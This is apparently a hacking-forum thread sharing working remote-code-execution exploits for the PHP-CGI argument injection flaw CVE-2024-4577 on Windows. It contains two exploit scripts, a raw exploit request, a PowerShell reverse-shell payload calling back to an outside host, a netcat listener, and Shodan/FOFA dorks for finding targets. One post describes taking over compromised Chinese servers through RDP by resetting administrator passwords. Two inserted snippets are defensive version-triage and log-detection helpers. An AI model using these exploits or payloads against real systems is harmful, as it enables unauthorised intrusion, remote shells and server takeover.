
Remote CVE-2024-4577 (PHP cgi injection RCE for windows)

heartBit

HDD-drive
User
Registered
17.03.2024
Messages
20
Reactions
3
Deal guarantor
1
Deposit
0.0036
● Github for the exploit: https://github.com/watchtowrlabs/CVE-2024-4577
● Usage: python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('Your_CMD_Command');?>" -t url
Affected versions of PHP: 8.3 < 8.3.8; 8.2 < 8.2.20; 8.1 < 8.1.29

watchTowr-vs-php_cve-2024-4577.py
Python:
"""
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
Discovered by: Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
Exploit By: Aliz (@AlizTheHax0r) and Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)
Technical details: https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?github
Reference: https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
"""

banner = """             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
       \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
                  \\/          \\/     \\/                           
      
        watchTowr-vs-php_cve-2024-4577.py
        (*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
          - Aliz Hammond, watchTowr (aliz@watchTowr.com)
          - Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
        CVEs: [CVE-2024-4577]  """


import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse

print(banner)
print("(^_^) prepare for the Pwnage (^_^)\n")

parser = argparse.ArgumentParser(usage="""python CVE-2024-4577 --target http://192.168.1.1/index.php -c "<?php system('calc')?>""")
parser.add_argument('--target', '-t', dest='target', help='Target URL', required=True)
parser.add_argument('--code', '-c', dest='code', help='php code to execute', required=True)
args = parser.parse_args()
args.target = args.target.rstrip('/')


s = requests.Session()
s.verify = False



res = s.post(f"{args.target.rstrip('/')}?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", data=f"{args.code};echo 1337; die;" )
if('1337' in res.text ):
    print('(+) Exploit was successful')
else:
    print('(!) Exploit may have failed')

You may leave the dorks for shodan and FOFA down below
👇👇👇👇👇👇👇
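Added example (not code from the thread, watchTowr or DEVCORE): a small triage helper that turns the affected-version list above into a check a defender can run over an inventory of `X-Powered-By` or `Server` header values. It classifies a version as affected, fixed, or unclassified for branches the thread does not list; the header strings fed to it here are constructed. A version match is only a first filter: the bug needs Windows plus PHP running as CGI, so a hit still has to be confirmed against the deployment.

```python
import re

# Affected ranges as stated in the thread: 8.3 < 8.3.8, 8.2 < 8.2.20, 8.1 < 8.1.29.
# Each entry maps a branch to the first fixed patch release in that branch.
# Branches outside these three are deliberately left unclassified (None).
FIXED_IN = {
    (8, 1): (8, 1, 29),
    (8, 2): (8, 2, 20),
    (8, 3): (8, 3, 8),
}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_php_version(text):
    """Extract a (major, minor, patch) tuple from strings such as 'PHP/8.2.19'
    or 'X-Powered-By: PHP/8.1.27'. Returns None when no x.y.z version is present."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(part) for part in m.groups())


def is_affected_version(text):
    """True if the version is below the fixed release of its branch, False if it
    is at or above it, None if the branch is not one the thread lists."""
    version = parse_php_version(text)
    if version is None:
        return None
    fixed = FIXED_IN.get(version[:2])
    if fixed is None:
        return None
    return version < fixed  # tuple comparison: (8, 2, 19) < (8, 2, 20)


def triage_headers(headers):
    """Map each header value to a verdict string for a quick inventory pass."""
    labels = {True: "affected", False: "fixed", None: "unclassified"}
    return {h: labels[is_affected_version(h)] for h in headers}


if __name__ == "__main__":
    # Constructed sample header values, not observed data.
    sample = [
        "X-Powered-By: PHP/8.2.19",
        "X-Powered-By: PHP/8.3.8",
        "X-Powered-By: PHP/8.1.28",
        "Server: Apache/2.4.58 (Win64) PHP/7.4.33",
    ]
    for header, verdict in triage_headers(sample).items():
        print(f"{verdict:12} {header}")
```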
 
Shortened version, without banners and other junk.
-d allow_url_include=1 -d auto_prepend_file=php://input
The whole point is the "dash" = %AD, which is not escaped but interpreted.
POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>
labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
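Added example, not part of the thread and not code from watchTowr or DEVCORE: the raw request above shows the detection signature a defender needs, so this is a log-side check for Apache combined-format access logs. It flags a percent-encoded soft hyphen (`%AD`) at the start of the query string or directly after an argument separator, which is the same condition as the `RewriteCond %{QUERY_STRING} ^%ad [NC]` mitigation rule DEVCORE published, extended to the `+`/`&` positions used in the second `-d` of the request, and it separately flags the two ini directives these requests inject. The log lines are constructed; a UTF-8 soft hyphen inside an ordinary parameter value is included to show it does not trigger.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache "combined" log line; only the request target is needed here.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Percent-encoded soft hyphen at the start of the query string or right after
# an argument separator, followed by an option letter: the shape the thread's
# request uses ("%ADd" standing in for "-d").
_SOFT_HYPHEN_OPT = re.compile(r'(?:^|\+|%20|&)%ad[a-z]', re.IGNORECASE)

# ini directives injected in the thread's requests; their presence in a query
# string is suspicious on its own.
_INJECTED_DIRECTIVES = ("allow_url_include", "auto_prepend_file")


def inspect_request_target(target):
    """Return a list of finding names for one request target, empty if clean."""
    findings = []
    if "?" not in target:
        return findings
    query = target.split("?", 1)[1]
    if _SOFT_HYPHEN_OPT.search(query):
        findings.append("soft-hyphen-option")
    # Decode once so "%3d" and friends do not hide a directive name.
    decoded = unquote_to_bytes(query).lower()
    for directive in _INJECTED_DIRECTIVES:
        if directive.encode() in decoded:
            findings.append("ini-directive:" + directive)
    return findings


def scan_access_log(lines):
    """Return (ip, timestamp, target, findings) for every line with findings."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        findings = inspect_request_target(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("ts"), m.group("target"), findings))
    return hits


# Constructed sample log lines (documentation IP ranges), not observed traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jul/2024:10:15:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '203.0.113.9 - - [07/Jul/2024:10:15:07 +0000] "POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 1043',
    '198.51.100.3 - - [07/Jul/2024:10:16:22 +0000] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 77',
    '198.51.100.4 - - [07/Jul/2024:10:17:00 +0000] "GET /index.php?q=%C2%ADsoft HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, ts, target, findings in scan_access_log(SAMPLE_LOG):
        print(f"{ip} [{ts}] {target} -> {', '.join(findings)}")
```

The directive check is kept separate from the soft-hyphen check so that a request which injects options through some other byte that Best-Fit maps to `-` still surfaces on the directive names alone.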
 
As Orange and watchTowr say in the blog, the default XAMPP installation is affected.

DEVCORE confirm these locales are affected: Traditional Chinese, Simplified Chinese, Japanese; other locales like English or Western ones may be affected depending on the configured scenario.

You can search for XAMPP in FOFA or Shodan, and this is a nuclei template to test with:

 
I pulled a list of IPs via Shodan for China. On many of the compromised ones the RDP port is open and you can change the administrator password and log in under that account.
But for that you need to make adjustments to this exploit so that it works.

And also replace the request itself and put in the one from nuclei.
 

Description


In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.


"XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode."




PHP Payload


PHP:
# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";

exec($payload);
?>

Scanning server

Bash:
$ python3 CVE-2024-4577.py -s -t https://target.com/
                                                 
 _____ _____ _____ _____ _____ _____                 _____       _         _  
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|
                                                |___|         |___|          
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner                    
   
[+] Target https://target.com is vulnerable to CVE-2024-4577

Exploiting Vulnerable server


Bash:
$ python3 CVE-2024-4577.py -t http://example.com/index.php -e -p rev_shell.php
                                                 
 _____ _____ _____ _____ _____ _____                 _____       _         _  
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|
                                                |___|         |___|          
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner

[+] Exploit successful!

Netcat Listener


Bash:
$ nc -lvnp 9001

Discovering vulnerable host


  • Shodan: server: PHP 8.1, server: PHP 8.2, server: PHP 8.3
  • FOFA: protocol="http" && header="X-Powered-By:PHP/8.1" || header="X-Powered-By:PHP/8.2" || header="X-Powered-By:PHP/8.3"

Source Github : https://github.com/l0n3m4n/CVE-2024-4577-RCE


Python:
import argparse
import requests
from colorama import init, Fore, Style

init(autoreset=True)

def scan_for_vulnerability(target_url):
    """Scanning for RCE CVE-2024-4577 PHP CGI Argument Injection vulnerability"""
    try:
        payload = "?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        url = f"{target_url}/{payload}"
        
        # Send a POST request payload to detect vulnerability
        response = requests.post(url, data="echo 'Test'; die;", timeout=5)  # Adjust timeout as needed
        
        if 'Test' in response.text:
            return True
        else:
            return False
    except requests.exceptions.RequestException:
        return False

def exploit(target_url, payload_file):
    """Exploiting CVE-2024-4577 """
    try:
        payload = "?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        url = f"{target_url}/{payload}"
        
        with open(payload_file, 'r') as file:
            php_payload = file.read()
        
        # Send a POST request with the provided PHP code
        response = requests.post(url, data=php_payload, timeout=5)# Adjust timeout as needed
        
        if response.status_code == 200:
            print(f'{Fore.GREEN}[+] Exploit successful!')
        else:
            print(f'{Fore.RED}[!] Exploit may have failed.')
    except requests.exceptions.RequestException as e:
        print(f"{Fore.RED}Error: {e}")
 
if __name__ == "__main__":
    banner = f"""{Fore.LIGHTCYAN_EX}                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_| 
                                                |___|         |___|           
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner                     
    {Style.RESET_ALL}"""
    parser = argparse.ArgumentParser(description="RCE: PHP CGI Argument Injection Scanner and Exploit",
                                     epilog=f"{Fore.LIGHTCYAN_EX}Example: python3 CVE-2024-4577.py -t http://example.com -e -p shell.php{Style.RESET_ALL}")
    print(banner)
    parser.add_argument('-t', '--target', dest='target', help='Target URL or domain (e.g., http://example.com)', required=True)
    parser.add_argument('-s', '--scan', action='store_true', help='Scan for the vulnerability only')
    parser.add_argument('-e', '--exploit', action='store_true', help='Exploit the vulnerability after scanning')
    parser.add_argument('-p', '--payload', dest='payload_file', help='PHP payload file to execute (e.g., shell.php)')
 
    args = parser.parse_args()

    # --target is already required by argparse; this is only a defensive fallback.
    if not args.target:
        parser.error('Please provide a target URL (--target)')

    if args.target:
        args.target = args.target.rstrip('/')
    
    if args.scan and args.target:
        if scan_for_vulnerability(args.target):
            print(f"{Fore.LIGHTGREEN_EX}[+] Target {args.target} is vulnerable to CVE-2024-4577{Style.RESET_ALL}\n")
        else:
            print(f"{Fore.LIGHTYELLOW_EX}[-] Target {args.target} is not vulnerable to CVE-2024-4577{Style.RESET_ALL}\n")
    
    if args.exploit and args.payload_file and args.target:
        exploit(args.target, args.payload_file)
    elif args.exploit:
        print(f"{Fore.RED}[-] Please provide PHP payload to execute using the --payload option")
 

